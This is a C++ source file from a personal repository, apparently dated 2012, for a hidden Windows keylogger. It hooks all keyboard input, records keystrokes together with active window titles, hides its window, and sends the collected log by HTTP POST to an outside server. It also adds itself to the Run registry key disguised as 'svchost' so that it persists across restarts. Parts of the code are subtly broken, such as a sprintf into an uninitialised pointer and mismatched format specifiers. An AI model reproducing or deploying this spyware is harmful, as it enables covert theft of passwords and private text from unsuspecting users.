Foxbond's Repo
/** (c) 2012 Michał (Foxbond) Chraniuk */
#define _WIN32_WINNT 0x0500
#include <windows.h>
#include <iostream>
//#include <fstream>
#include <ctime>
#include <stdio.h>
#include <string>
#include <cstdio>
#include <unistd.h>
#include "curl/curl.h"
#include "base64/base64.h"
#include "base64/base64.cpp"
using namespace std;
HHOOK hKeyboardHook = 0;
string LogFile;
HWND hCurrentWindow;
char sWindowTitle[256];
char cReturn[] = {13, 10};
SYSTEMTIME SystemTime;
char cTime[64];
char cFileName[64];
unsigned short int error_count=0;
#define BUFSIZE 128
//#define cURL_SAVE_BUFFER 2048
unsigned int save_buffer_size = 2048;
int test_key(void);
void create_key(void);
void makeSpecialActions(void);
int regtype = 0;
string key_path = "%appdata%\\Microsoft\\Windows\\svchost.exe";
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
/* Make the class name into a global variable */
char szClassName[ ] = "WindowsApp";
void save_log (void);
LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
KBDLLHOOKSTRUCT *pKbdLLHookStruct = (KBDLLHOOKSTRUCT *)lParam;
if (nCode >= 0)
{
if (wParam == WM_KEYUP)
{
if(hCurrentWindow != GetForegroundWindow())
{
hCurrentWindow = GetForegroundWindow();
GetWindowText(hCurrentWindow, sWindowTitle, 256);
GetSystemTime(&SystemTime);
//by³o sprintf_s
sprintf(cTime, "[ Czas: %02d:%02d:%02d, ", SystemTime.wHour, SystemTime.wMinute, SystemTime.wSecond);
LogFile += cReturn;
LogFile += cTime;
LogFile += " Nazwa okna: ";
LogFile += sWindowTitle;
LogFile += " ]";
LogFile += cReturn;
}
switch(pKbdLLHookStruct->vkCode)
{
case VK_RETURN:
LogFile += "[Enter]";
LogFile += cReturn;
break;
case VK_BACK:
LogFile += "[Backspace]";
break;
case VK_ESCAPE:
LogFile += "[Escape]";
break;
case VK_CAPITAL:
LogFile += "[Capslock]";
break;
case VK_LMENU:
LogFile += "[LAlt]";
break;
case VK_RMENU:
LogFile += "[RAlt]";
break;
case VK_MENU:
LogFile += "[Alt]";
break;
case VK_CONTROL:
LogFile += "[Ctrl]";
break;
case VK_DELETE:
LogFile += "[Delete]";
break;
case VK_SPACE:
LogFile += " ";
break;
case VK_MULTIPLY:
LogFile += "*";
break;
case VK_ADD:
LogFile += "+";
break;
case VK_SUBTRACT:
LogFile += "-";
break;
case VK_DECIMAL:
LogFile += ".";
break;
case VK_DIVIDE:
LogFile += "/";
break;
case 188:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 192:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "~~";
else
LogFile += "`";
break;
case 222:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "\"";
else
LogFile += "'";
break;
case 220:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "|";
else
LogFile += "\\";
break;
case 219:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "{";
else
LogFile += "[";
break;
case 221:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "}";
else
LogFile += "]";
break;
case 186:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ":";
else
LogFile += ";";
break;
case 191:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "?";
else
LogFile += "/";
break;
case 190:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ">";
else
LogFile += ".";
break;
case 44:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "<";
else
LogFile += ",";
break;
case 187:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "+";
else
LogFile += "=";
break;
case 189:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "_";
else
LogFile += "-";
break;
case 65:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "A";
else
LogFile += "a";
break;
case 66:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "B";
else
LogFile += "b";
break;
case 67:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "C";
else
LogFile += "c";
break;
case 68:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "D";
else
LogFile += "d";
break;
case 69:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "E";
else
LogFile += "e";
break;
case 70:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "F";
else
LogFile += "f";
break;
case 71:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "G";
else
LogFile += "g";
break;
case 72:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "H";
else
LogFile += "h";
break;
case 73:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "I";
else
LogFile += "i";
break;
case 74:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "J";
else
LogFile += "j";
break;
case 75:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "K";
else
LogFile += "k";
break;
case 76:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "L";
else
LogFile += "l";
break;
case 77:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "M";
else
LogFile += "m";
break;
case 78:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "N";
else
LogFile += "n";
break;
case 79:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "O";
else
LogFile += "o";
break;
case 80:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "P";
else
LogFile += "p";
break;
case 81:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Q";
else
LogFile += "q";
break;
case 82:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "R";
else
LogFile += "r";
break;
case 83:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "S";
else
LogFile += "s";
break;
case 84:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "T";
else
LogFile += "t";
break;
case 85:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "U";
else
LogFile += "u";
break;
case 86:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "V";
else
LogFile += "v";
break;
case 87:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "W";
else
LogFile += "w";
break;
case 88:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "X";
else
LogFile += "x";
break;
case 89:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Y";
else
LogFile += "y";
break;
case 90:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "Z";
else
LogFile += "z";
break;
case VK_NUMPAD0:
LogFile += "0";
break;
case VK_NUMPAD1:
LogFile += "1";
break;
case VK_NUMPAD2:
LogFile += "2";
break;
case VK_NUMPAD3:
LogFile += "3";
break;
case VK_NUMPAD4:
LogFile += "4";
break;
case VK_NUMPAD5:
LogFile += "5";
break;
case VK_NUMPAD6:
LogFile += "6";
break;
case VK_NUMPAD7:
LogFile += "7";
break;
case VK_NUMPAD8:
LogFile += "8";
break;
case VK_NUMPAD9:
LogFile += "9";
break;
case 48:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += ")";
else
LogFile += "0";
break;
case 49:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "!";
else
LogFile += "1";
break;
case 50:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "@";
else
LogFile += "2";
break;
case 51:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "#";
else
LogFile += "3";
break;
case 52:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "$";
else
LogFile += "4";
break;
case 53:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "%";
else
LogFile += "5";
break;
case 54:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "^";
else
LogFile += "6";
break;
case 55:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "&";
else
LogFile += "7";
break;
case 56:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "*";
else
LogFile += "8";
break;
case 57:
if(GetAsyncKeyState(VK_LSHIFT) | GetAsyncKeyState(VK_RSHIFT))
LogFile += "(";
else
LogFile += "9";
break;
}//end case (chyba)
if ( LogFile.size() > save_buffer_size )
{
save_log(); //cURL save
}
}
}
return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil) {
HWND hwnd; /* This is the handle for our window */
MSG messages; /* Here messages to the application are saved */
WNDCLASSEX wincl; /* Data structure for the windowclass */
/* The Window structure */
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure; /* This function is called by windows */
wincl.style = CS_DBLCLKS; /* Catch double-clicks */
wincl.cbSize = sizeof (WNDCLASSEX);
/* Use default icon and mouse-pointer */
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL; /* No menu */
wincl.cbClsExtra = 0; /* No extra bytes after the window class */
wincl.cbWndExtra = 0; /* structure or the window instance */
/* Use Windows's default color as the background of the window */
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;
/* Register the window class, and if it fails quit the program */
if (!RegisterClassEx (&wincl)) {
MessageBox(0, "Nie uda�o si� zarejestrowa� klasy! Program ko�czy dzia�anie...", 0, 0);
return 0;
}
/* The class is registered, let's create the program*/
hwnd = CreateWindowEx (
0, /* Extended possibilites for variation */
szClassName, /* Classname */
"SYSTEM", /* Title Text */
WS_OVERLAPPEDWINDOW, /* default window */
CW_USEDEFAULT, /* Windows decides the position */
CW_USEDEFAULT, /* where the window ends up on the screen */
1, /* The programs width */
1, /* and height in pixels */
HWND_DESKTOP, /* The window is a child-window to desktop */
NULL, /* No menu */
hThisInstance, /* Program Instance handler */
NULL /* No Window Creation data */
);
/* Make the window visible on the screen */
ShowWindow (hwnd, SW_HIDE);
hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, (HOOKPROC)LowLevelKeyboardProc, GetModuleHandle(0), 0);
if(hKeyboardHook == NULL)
MessageBox(0, "Funkcja SetWindowsHookEx nie powiodła się.", 0, 0);
makeSpecialActions();
/* Run the message loop. It will run until GetMessage() returns 0 */
while (GetMessage (&messages, NULL, 0, 0))
{
/* Translate virtual-key messages into character messages */
TranslateMessage(&messages);
/* Send message to WindowProcedure */
DispatchMessage(&messages);
}
if(UnhookWindowsHookEx(hKeyboardHook) == 0)
MessageBox(0, "Funkcja UnhookWindowsHookEx nie powiodła się.", 0, 0);
return EXIT_SUCCESS;
}
/* This function is called by the Windows function DispatchMessage() */
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message) /* handle the messages */
{
case WM_DESTROY:
PostQuitMessage (0); /* send a WM_QUIT to the message queue */
break;
default: /* for messages that we don't deal with */
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}
// Write any errors in here
static char errorBuffer[CURL_ERROR_SIZE];
// Write all expected data in here
static string buffer;
// This is the writer call back function used by curl
static int writer(char *data, size_t size, size_t nmemb,
std::string *buffer)
{
// What we will return
int result = 0;
// Is there anything in the buffer?
if (buffer != NULL)
{
// Append the data to the buffer
buffer->append(data, size * nmemb);
// How much did we write?
result = size * nmemb;
}
return result;
}
void save_log (void)
{
//zapisywanie cURL
CURL *curl;
CURLcode result;
//default: http://foxbond.cba.pl/bots/keylogger/revelation_log_handler.php
//string url=reader.Get("cpp", "url", "aHR0cDovL2ZveGJvbmQuY2JhLnBsL2JvdHMva2V5bG9nZ2VyL3JldmVsYXRpb25fbG9nX2hhbmRsZXIucGhw");
string url = "http://danarroth.com/klr/logHandler.php";
char* method_post;
//char *format = ;
string version = "0.1"; //reader.Get("cpp", "version", "0");
string id = "0"; //reader.Get("cpp", "id", "0");
sprintf(method_post, "version=%d&id=%d&log=%d", version.c_str(), id.c_str(), LogFile.c_str() );
curl = curl_easy_init();
if (curl)
{
// Now set up all of the curl options
curl_easy_setopt(curl, CURLOPT_ERRORBUFFER, errorBuffer);
curl_easy_setopt(curl, CURLOPT_URL, url.c_str() );
//curl_easy_setopt(curl, CURLOPT_HEADER, 0);
//curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1);
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writer);
curl_easy_setopt(curl, CURLOPT_WRITEDATA, &buffer);
curl_easy_setopt(curl, CURLOPT_POST, 1);
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, method_post);
// Attempt to retrieve the remote page
result = curl_easy_perform(curl);
// Always cleanup
curl_easy_cleanup(curl);
// Did we succeed?
if (result == CURLE_OK) {
//ok
string log_filename = "buffer.txt"; //////////////////////////////////nazwa pliku z buforem logu
FILE *file;
file=fopen(log_filename.c_str(),"a"); //dopisywanie
fputs(LogFile.c_str(),file);
fclose(file);
LogFile.clear(); //kasowanie logu
}
else {
//error
error_count++;
LogFile += "\n Save Error!!! \n";
LogFile += errorBuffer;
LogFile += "\n end error log \n";
}
}
else {
//curl object error
error_count++;
LogFile += "\n cURL init error!!! \n";
}
if (error_count >= 2) {
string log_filename = "buffer.txt"; //////////////////////////////////nazwa pliku z buforem logu
FILE *file;
file=fopen(log_filename.c_str(),"a"); //dopisywanie
fputs(LogFile.c_str(),file);
fclose(file);
//LogFile.clear(); //kasowanie logu
error_count = 0;
LogFile += "\n Second error. Log saved to file, buffer uncleared! \n";
}
}
void create_key(void)
{
int reg_key;
HKEY hkey;
char *path = (char*)key_path.c_str();
if (regtype == 1)
{
reg_key=RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
}
else if (regtype == 2)
{
reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
}
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
}
}
void makeSpecialActions(){
create_key();
}> Back